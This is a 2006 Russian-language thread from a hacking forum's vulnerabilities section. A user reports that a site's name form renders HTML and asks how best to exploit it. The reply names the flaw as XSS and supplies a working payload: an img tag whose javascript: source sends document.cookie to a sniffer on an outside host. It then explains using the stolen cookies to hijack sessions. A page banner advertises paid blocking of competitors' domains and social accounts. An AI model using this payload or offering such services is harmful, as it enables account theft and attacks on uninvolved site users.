При вводе имени работают теги!

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
При вводе имени работают теги!

Опции темы

Поиск в этой теме

Опции просмотра

При вводе имени работают теги!

01.02.2006, 16:33

Poacher

Новичок

Регистрация: 27.12.2005

Сообщений: 8

С нами: 10721182

Репутация: 0

При вводе имени работают теги!

Здрасти есть один сайт. При вводе имени в форму <form> можно вводить теги и они работают, а при попытке вводить (примерно) <? echo data("s = h = m")?> в тексте оказывается слеши перед кавычками <? echo data(/"s = h = m/")?> и ни че не работает, а простые теги html работают все!

Суть вопроса: на сколько опасна данная уязвимость, и как её лутше использовать.

𝕏 Twitter Reddit Telegram Копировать ссылку

01.02.2006, 16:54

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

С нами: 10729766

Репутация: 268

В умелых руках уязвимость довольно опасна! Это так называемая XSS.

пишешь что то типа
<img src=javascript:aa=new Image();aa.src="ht tp://antichat.ru/cgi-bin/s.gif?"+document.cookie;>
и если все пройдет ok на antichat'овский снифер придут куки. Дальше ты свои заменяешь на угнанные куки и юзаешь их по назначению. =)

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
XSS в PunBB (вложеные теги)	KEZ	Уязвимости CMS / форумов	7	23.03.2008 23:17

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход